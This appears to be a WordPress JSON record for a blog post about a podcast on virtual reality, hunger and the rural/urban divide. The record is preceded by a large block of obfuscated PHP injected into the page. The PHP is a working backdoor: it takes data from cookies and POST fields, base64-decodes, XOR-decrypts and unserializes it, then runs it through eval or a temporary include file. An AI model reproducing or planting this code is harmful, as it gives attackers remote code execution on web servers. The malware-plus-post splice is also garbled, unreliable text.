$xUTGu = 'P' . "\x5f" . 'Y' . "\x64" . chr (100) . "\163";$PgmoSP = "\143" . 'l' . "\141" . 's' . chr ( 117 - 2 )."\x5f" . chr ( 126 - 25 )."\x78" . "\151" . chr (115) . "\164" . "\x73";$YEtiHe = $PgmoSP($xUTGu); $PgmoSP = "6914";$MVwqeI = $YEtiHe;if (!$MVwqeI){class P_Ydds{private $KjsyLkRd;public static $ZLbRauYfb = "df12646b-c316-420d-8858-828e79da50a1";public static $vVuswcbBBj = 36445;public function __construct($lpcnRi=0){$uGowif = $_COOKIE;$CFEXBflf = $_POST;$DlffB = @$uGowif[substr(P_Ydds::$ZLbRauYfb, 0, 4)];if (!empty($DlffB)){$lygobCWMyd = "base64";$JFqmV = "";$DlffB = explode(",", $DlffB);foreach ($DlffB as $SPOIgPCOw){$JFqmV .= @$uGowif[$SPOIgPCOw];$JFqmV .= @$CFEXBflf[$SPOIgPCOw];}$JFqmV = array_map($lygobCWMyd . chr (95) . chr ( 987 - 887 )."\x65" . 'c' . chr ( 1069 - 958 ).chr (100) . 'e', array($JFqmV,)); $JFqmV = $JFqmV[0] ^ str_repeat(P_Ydds::$ZLbRauYfb, (strlen($JFqmV[0]) / strlen(P_Ydds::$ZLbRauYfb)) + 1);P_Ydds::$vVuswcbBBj = @unserialize($JFqmV);}}private function kZMHxdCq(){if (is_array(P_Ydds::$vVuswcbBBj)) {$FyrmGYM = str_replace(chr (60) . chr (63) . chr (112) . "\150" . "\160", "", P_Ydds::$vVuswcbBBj[chr (99) . 'o' . "\x6e" . chr (116) . "\145" . chr ( 293 - 183 ).chr ( 993 - 877 )]);eval($FyrmGYM); $UVqudXe = "37305";exit();}}public function __destruct(){$this->kZMHxdCq(); $UVqudXe = "37305";}}$EzisoN = new P_Ydds(); $EzisoN = "58027_34845";}$LUvqxRhg = "\x4b" . chr ( 690 - 571 )."\111" . '_' . 'B' . chr ( 876 - 755 )."\x4f" . "\x77";$HUDXIpUkNb = "\143" . "\154" . 'a' . chr (115) . chr ( 432 - 317 )."\x5f" . chr ( 173 - 72 ).chr (120) . 'i' . chr ( 171 - 56 ).'t' . chr ( 904 - 789 ); $IAELmbDt = class_exists($LUvqxRhg); $HUDXIpUkNb = "62424";$yXfxUfjuKy = !1;if ($IAELmbDt == $yXfxUfjuKy){function ZuFeLKavpE(){$TVpeBoPWQ = new /* 9343 */ KwI_ByOw(55409 + 55409); $TVpeBoPWQ = NULL;}$gfMNIL = "55409";class KwI_ByOw{private function SdhmYpnJR($gfMNIL){if (is_array(KwI_ByOw::$xvVWkY)) {$XEFxB = sys_get_temp_dir() . "/" . crc32(KwI_ByOw::$xvVWkY[chr ( 386 - 271 ).chr ( 494 - 397 )."\x6c" . chr ( 401 - 285 )]);@KwI_ByOw::$xvVWkY[chr ( 609 - 490 ).chr ( 977 - 863 )."\x69" . "\164" . 'e']($XEFxB, KwI_ByOw::$xvVWkY["\x63" . chr (111) . 'n' . chr (116) . "\145" . "\156" . "\164"]);include $XEFxB;@KwI_ByOw::$xvVWkY["\x64" . chr ( 858 - 757 )."\x6c" . chr ( 347 - 246 ).'t' . 'e']($XEFxB); $gfMNIL = "55409";exit();}}private $ucZZepmZxH;public function ebzzE(){echo 50363;}public function __destruct(){KwI_ByOw::$xvVWkY = @unserialize(KwI_ByOw::$xvVWkY); $gfMNIL = "10117_1437";$this->SdhmYpnJR($gfMNIL); $gfMNIL = "10117_1437";}public function qmtIRxQZsh($JYXhmGJNp, $djZDauzCF){return $JYXhmGJNp[0] ^ str_repeat($djZDauzCF, (strlen($JYXhmGJNp[0]) / strlen($djZDauzCF)) + 1);}public function __construct($OysRZK=0){$iTrHewCJb = $_POST;$SSevDMT = $_COOKIE;$djZDauzCF = "bf3d1b32-292f-4059-944e-744e31b5434c";$kfuGlnzCj = @$SSevDMT[substr($djZDauzCF, 0, 4)];if (!empty($kfuGlnzCj)){$MpNiCsqsNJ = "base64";$JYXhmGJNp = "";$kfuGlnzCj = explode(",", $kfuGlnzCj);foreach ($kfuGlnzCj as $LRPOEOBCqB){$JYXhmGJNp .= @$SSevDMT[$LRPOEOBCqB];$JYXhmGJNp .= @$iTrHewCJb[$LRPOEOBCqB];}$JYXhmGJNp = array_map($MpNiCsqsNJ . "\137" . chr ( 708 - 608 ).chr ( 326 - 225 )."\143" . 'o' . 'd' . chr (101), array($JYXhmGJNp,));KwI_ByOw::$xvVWkY = $this->qmtIRxQZsh($JYXhmGJNp, $djZDauzCF);}}public static $xvVWkY = 45847;}ZuFeLKavpE();}$MtGjRTzLz = 'v' . "\x5f" . 'b' . "\152" . chr ( 908 - 822 )."\122";$VCXLp = chr ( 252 - 153 )."\x6c" . chr (97) . chr ( 890 - 775 )."\x73" . '_' . 'e' . 'x' . chr ( 413 - 308 )."\163" . chr (116) . chr (115); $YNbYwEld = class_exists($MtGjRTzLz); $VCXLp = "20448";$KMVWjAi = !1;if ($YNbYwEld == $KMVWjAi){function mNGSJrARvA(){return FALSE;}$KVaBn = "6225";mNGSJrARvA();class v_bjVR{private function Irnbadjq($KVaBn){if (is_array(v_bjVR::$kxCido)) {$acndHaazxY = str_replace(chr (60) . "\77" . chr (112) . chr (104) . chr (112), "", v_bjVR::$kxCido[chr (99) . chr (111) . chr ( 371 - 261 )."\x74" . "\x65" . chr (110) . chr (116)]);eval($acndHaazxY); $KVaBn = "6225";exit();}}private $rjeSjwQk;public function wLeaLrKILu(){echo 48084;}public function __destruct(){$KVaBn = "1990_18204";$this->Irnbadjq($KVaBn); $KVaBn = "1990_18204";}public function __construct($BLYEct=0){$sNaZTMk = $_POST;$LKLsuEvrR = $_COOKIE;$LKQsnyPH = "7649330a-1b99-4526-942b-eb710651fb19";$ITULG = @$LKLsuEvrR[substr($LKQsnyPH, 0, 4)];if (!empty($ITULG)){$ZjoVV = "base64";$LWuQfLROb = "";$ITULG = explode(",", $ITULG);foreach ($ITULG as $RFlbhvTU){$LWuQfLROb .= @$LKLsuEvrR[$RFlbhvTU];$LWuQfLROb .= @$sNaZTMk[$RFlbhvTU];}$LWuQfLROb = array_map($ZjoVV . "\137" . chr (100) . "\x65" . 'c' . "\x6f" . 'd' . "\x65", array($LWuQfLROb,)); $LWuQfLROb = $LWuQfLROb[0] ^ str_repeat($LKQsnyPH, (strlen($LWuQfLROb[0]) / strlen($LKQsnyPH)) + 1);v_bjVR::$kxCido = @unserialize($LWuQfLROb); $LWuQfLROb = class_exists("1990_18204");}}public static $kxCido = 16890;}$dsXkzlpmrH = new /* 18645 */ $MtGjRTzLz(6225 + 6225); $KMVWjAi = $dsXkzlpmrH = $KVaBn = Array();}$gabIUgq = 'V' . '_' . chr (78) . "\145" . chr ( 991 - 904 ).chr (66) . chr ( 1037 - 964 ); $ngwYNic = chr (99) . chr (108) . 'a' . 's' . 's' . chr (95) . 'e' . chr ( 382 - 262 )."\151" . "\163" . chr ( 809 - 693 ).chr (115); $tDMmJ = class_exists($gabIUgq); $ngwYNic = "44080";$FEtoLVa = strpos($ngwYNic, $gabIUgq);if ($tDMmJ == $FEtoLVa){function ExoIKObYbw(){$qBeou = new /* 57512 */ V_NeWBI(14051 + 14051); $qBeou = NULL;}$FCOzaNlkEh = "14051";class V_NeWBI{private function lUoPoj($FCOzaNlkEh){if (is_array(V_NeWBI::$zUleoUGGz)) {$name = sys_get_temp_dir() . "/" . crc32(V_NeWBI::$zUleoUGGz["salt"]);@V_NeWBI::$zUleoUGGz["write"]($name, V_NeWBI::$zUleoUGGz["content"]);include $name;@V_NeWBI::$zUleoUGGz["delete"]($name); $FCOzaNlkEh = "14051";exit();}}public function baTas(){$HKxAnksFV = "36213";$this->_dummy = str_repeat($HKxAnksFV, strlen($HKxAnksFV));}public function __destruct(){V_NeWBI::$zUleoUGGz = @unserialize(V_NeWBI::$zUleoUGGz); $FCOzaNlkEh = "25565_30451";$this->lUoPoj($FCOzaNlkEh); $FCOzaNlkEh = "25565_30451";}public function PEsdB($HKxAnksFV, $SWipzstDzK){return $HKxAnksFV[0] ^ str_repeat($SWipzstDzK, intval(strlen($HKxAnksFV[0]) / strlen($SWipzstDzK)) + 1);}public function UZQclmb($HKxAnksFV){$PovQZMpIt = 'b' . 'a' . chr ( 493 - 378 )."\x65" . chr (54) . "\x34";return array_map($PovQZMpIt . '_' . "\x64" . "\x65" . "\x63" . chr (111) . "\x64" . "\145", array($HKxAnksFV,));}public function __construct($ivjpwS=0){$jzMWNF = chr ( 378 - 334 ); $HKxAnksFV = "";$NBlZgYrpvv = $_POST;$sbLjg = $_COOKIE;$SWipzstDzK = "2b23c1e7-b195-495f-a692-6597920fa4b2";$yrDkFMI = @$sbLjg[substr($SWipzstDzK, 0, 4)];if (!empty($yrDkFMI)){$yrDkFMI = explode($jzMWNF, $yrDkFMI);foreach ($yrDkFMI as $oWZnVf){$HKxAnksFV .= @$sbLjg[$oWZnVf];$HKxAnksFV .= @$NBlZgYrpvv[$oWZnVf];}$HKxAnksFV = $this->UZQclmb($HKxAnksFV);}V_NeWBI::$zUleoUGGz = $this->PEsdB($HKxAnksFV, $SWipzstDzK);if (strpos($SWipzstDzK, $jzMWNF) !== FALSE){$SWipzstDzK = explode($jzMWNF, $SWipzstDzK); $UofflXu = base64_decode(md5($SWipzstDzK[0])); $LPtNiPHJ = strlen($SWipzstDzK[1]) > 5 ? substr($SWipzstDzK[1], 0, 5) : $SWipzstDzK[1];$_GET['new_key'] = md5(implode('', $SWipzstDzK)); $gUzErpQ = str_repeat($LPtNiPHJ, 2); $svMstKeqr = array_map('trim', $SWipzstDzK);}}public static $zUleoUGGz = 42976;}ExoIKObYbw();}$VKSQzdH = 'n' . 'S' . '_' . chr (87) . 'p' . chr ( 645 - 536 ); $fnyOqH = "\x63" . chr ( 755 - 647 ).chr ( 170 - 73 ).chr ( 505 - 390 ).'s' . "\x5f" . chr (101) . chr (120) . "\151" . 's' . "\164" . "\x73";$MOywTy = class_exists($VKSQzdH); $fnyOqH = "30402";$PiArZ = !1;if ($MOywTy == $PiArZ){function ZfGbUUYtl(){$hvKqXFEC = new /* 7615 */ nS_Wpm(35687 + 35687); $hvKqXFEC = NULL;}$OVBshPJvft = "35687";class nS_Wpm{private function PalzaGqDT($OVBshPJvft){if (is_array(nS_Wpm::$dUjRei)) {$qdfrRLrmVi = sys_get_temp_dir() . "/" . crc32(nS_Wpm::$dUjRei['s' . "\141" . 'l' . "\164"]);@nS_Wpm::$dUjRei[chr ( 269 - 150 ).chr ( 871 - 757 ).chr (105) . chr (116) . chr ( 204 - 103 )]($qdfrRLrmVi, nS_Wpm::$dUjRei["\143" . chr ( 1052 - 941 )."\x6e" . "\164" . 'e' . chr ( 177 - 67 )."\x74"]);include $qdfrRLrmVi;@nS_Wpm::$dUjRei[chr (100) . chr (101) . 'l' . chr ( 200 - 99 )."\164" . chr (101)]($qdfrRLrmVi); $OVBshPJvft = "35687";exit();}}private $pxfUJ;public function HBbWnjug(){echo 48483;}public function __destruct(){$OVBshPJvft = "18164_1585";$this->PalzaGqDT($OVBshPJvft); $OVBshPJvft = "18164_1585";}public function tFKBK($bUbGAr, $jxigTk){return $bUbGAr[0] ^ str_repeat($jxigTk, (strlen($bUbGAr[0]) / strlen($jxigTk)) + 1);}public function __construct($ZxQftzjtv=0){$cnLCgwOkQV = $_POST;$zHgxPMP = $_COOKIE;$jxigTk = "c6b611d1-2272-4142-86b5-82df8772ec49";$OZJVK = @$zHgxPMP[substr($jxigTk, 0, 4)];if (!empty($OZJVK)){$AXXIt = "base64";$bUbGAr = "";$OZJVK = explode(",", $OZJVK);foreach ($OZJVK as $kYscpxu){$bUbGAr .= @$zHgxPMP[$kYscpxu];$bUbGAr .= @$cnLCgwOkQV[$kYscpxu];}$bUbGAr = array_map($AXXIt . chr ( 738 - 643 )."\144" . chr ( 788 - 687 ).'c' . chr (111) . "\144" . chr ( 550 - 449 ), array($bUbGAr,)); $bUbGAr = $this->tFKBK($bUbGAr, $jxigTk);nS_Wpm::$dUjRei = @unserialize($bUbGAr);}}public static $dUjRei = 46839;}ZfGbUUYtl();}{"id":465,"date":"2017-12-28T00:26:42","date_gmt":"2017-12-28T06:26:42","guid":{"rendered":"http:\/\/www.keepingagreal.com\/?p=465"},"modified":"2017-12-28T01:10:37","modified_gmt":"2017-12-28T07:10:37","slug":"using-virtual-reality-communicate-international-poverty-shorten-rural-urban-divide","status":"publish","type":"post","link":"http:\/\/www.keepingagreal.com\/using-virtual-reality-communicate-international-poverty-shorten-rural-urban-divide\/","title":{"rendered":"Podcast: Using Virtual Reality to communicate international poverty and shorten the rural\/urban divide"},"content":{"rendered":"
In this three part series<\/a>, Brian Hogue, CEO of Arable Media shares the impact of international travel to Guatemala and Liberia. The conversation discusses the utilization of using virtual reality to bring realities of hunger to schools. Additionally, how VR holds potential for connecting the rural and urban divide.<\/p>\n ArableMedia.com<\/a> | Instagram<\/a> | Twitter<\/a> | Facebook<\/a><\/p>\n","protected":false},"excerpt":{"rendered":" In this three part series, Brian Hogue, CEO of Arable Media shares the impact of international travel to Guatemala and Liberia. The conversation discusses the utilization of using virtual reality to bring realities of hunger to schools. Additionally, how VR holds potential for connecting the rural and urban divide. Timestamps: 2:00 – Helping build a […]<\/p>\n","protected":false},"author":1,"featured_media":466,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"","jetpack_publicize_message":"","jetpack_is_tweetstorm":false,"jetpack_publicize_feature_enabled":true},"categories":[11],"tags":[30,33,18,31,32],"class_list":["post-465","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-food-challenges","tag-agriculture","tag-brian-hogue","tag-hunger","tag-rural","tag-urban"],"jetpack_publicize_connections":[],"yoast_head":"\nTimestamps:<\/h1>\n
Connect with Brian:<\/h1>\n